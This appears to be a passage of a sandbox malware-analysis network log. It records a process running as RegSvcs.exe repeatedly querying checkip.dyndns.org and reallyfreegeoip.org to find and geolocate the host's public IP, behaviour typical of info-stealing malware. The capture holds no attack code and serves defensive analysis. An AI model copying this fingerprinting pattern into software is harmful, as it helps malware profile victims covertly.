                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Oct 4, 2024 10:32:02.099112034 CEST320INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:02 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 9eb9c49a9c4f1634d4a222be7764834d
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                      Oct 4, 2024 10:32:02.153947115 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Oct 4, 2024 10:32:02.358464003 CEST320INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:02 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: df7acfdec93fea10d991995b8b6ac1f3
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                      Oct 4, 2024 10:32:03.263263941 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Oct 4, 2024 10:32:03.694257975 CEST320INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:03 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 9e79f0a85f0510116c29d26e3a5e39fd
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.449733158.101.44.242807456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 4, 2024 10:32:04.325052023 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Oct 4, 2024 10:32:05.920310974 CEST320INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:05 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 8def6b2bd1f3e735223a64da6e540adb
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.449735158.101.44.242807456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 4, 2024 10:32:06.517360926 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Oct 4, 2024 10:32:08.534051895 CEST320INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:08 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: fab9e473e8c8cb62a7ac18025fa9116e
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.449737158.101.44.242807456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 4, 2024 10:32:09.160677910 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Oct 4, 2024 10:32:09.929642916 CEST320INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:09 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: ee3587458d0930a59242c5a63276f9e7
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.449739158.101.44.242807456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 4, 2024 10:32:10.547310114 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Oct 4, 2024 10:32:11.111496925 CEST320INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:11 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 74c3b39b81d67fc4466258a9c9d0816d
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.449741158.101.44.242807456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 4, 2024 10:32:11.722376108 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Oct 4, 2024 10:32:12.303060055 CEST320INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:12 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: c6cda8438f6d3b8ac7942fbdfc617973
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.449743158.101.44.242807456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 4, 2024 10:32:12.907454967 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Oct 4, 2024 10:32:13.489728928 CEST320INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:13 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 7c9725d8f86d1787070e0083549915d1
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.449745158.101.44.242807456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 4, 2024 10:32:14.131958961 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Oct 4, 2024 10:32:14.737889051 CEST320INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:14 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: e924d6f7c27a3b1f1b9b8bba98e54d39
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449731188.114.97.34437456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-04 08:32:03 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-10-04 08:32:03 UTC672INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:03 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 62514
                                      Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qaVDvD9zNZi1wNypPWRZs1oOgpvzjZ7KwPzw9sKiqTbyA9VfjHYRb4PpXesLOBF1C3W3x1XuYXQgojAQ%2FlGP7nz0seXbextH1GPjaxpnrriygFkBD4QEJr1E4Smy6JciYlnus6AT"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8cd3d1b40d9dc325-EWR
                                      2024-10-04 08:32:03 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-10-04 08:32:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.449732188.114.97.34437456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-04 08:32:04 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-10-04 08:32:04 UTC678INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:04 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 62515
                                      Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QVXmlCzxqwYlKSW9JPyVRKi2ynvTtLbJPfojiIr2%2FMwMn7%2FT9ljhBcPQ%2FB%2F2XNoq4hi8OCZ608KeiKY9at45jMom06cvWr3Ozo0LGZ13CSjJBo0KFQjUgRn2l5bMUxfuv9JKxYNX"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8cd3d1baaa658cdd-EWR
                                      2024-10-04 08:32:04 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-10-04 08:32:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.449734188.114.97.34437456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-04 08:32:06 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-10-04 08:32:06 UTC680INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:06 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 62517
                                      Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BeO2pN9wQqO8AzxETNaNyB9OdkmhvlbglxQViI92lgXY%2B9Xs3fK8FngY3091OB%2FcmD3mAzR6Ms9z3XHN8Tz%2B9%2Fm8reR0OOE3TUmKux%2Bg3QnCcYVryBa62IC8v1Ja6gzgXCNG542J"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8cd3d1c85ef743e6-EWR
                                      2024-10-04 08:32:06 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-10-04 08:32:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.449736188.114.97.34437456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-04 08:32:09 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-10-04 08:32:09 UTC674INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:09 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 62520
                                      Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mUNLE9BYiu7XlcfqROVIr2MeIalU4w4Ur9HL4NxHjbw%2B3q8huTAyKhspLJE82i6Sj4%2FVgjLpG1xRYNdROcNroXb8aeS9YPKJF6EXWSjcGJsYlJf15DIp8NC6yBuCfiVhEYw6mcd2"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8cd3d1d8de524283-EWR
                                      2024-10-04 08:32:09 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-10-04 08:32:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.449738188.114.97.34437456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-04 08:32:10 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-10-04 08:32:10 UTC684INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:10 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 62521
                                      Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JxV%2Fkr7%2Fwz%2FnXGLZGTPXrWCLp66lxVRTGdtH7I457Wbr3W2FcfMOsXsEwX4EKPVDP%2Bg%2BN%2BGzdEjYXPwIN3GNecnrmd8UkqGehm668jTAMAIIuSL%2BPw9anSa7U2FbiJaO8SyRtBa0"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8cd3d1e1887842f7-EWR
                                      2024-10-04 08:32:10 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-10-04 08:32:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.449740188.114.97.34437456C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-04 08:32:11 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-10-04 08:32:11 UTC682INHTTP/1.1 200 OK
                                      Date: Fri, 04 Oct 2024 08:32:11 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 62522
                                      Last-Modified: Thu, 03 Oct 2024 15:10:09 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z3c2g3sujI%2Bt3OF%2FgkqYpmB7RKHSaGbAWAzyPAX91tKZ80FJs4IFoZ2dMUNxVPUeDS6GBNyi8iCvWuZo%2FjguESeFAzu%2B7177isQ6gLTQO0WfQqrjSgDQaECeCloH%2FCl3Bnh%2B4ZNm"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8cd3d1e8d89619b6-EWR
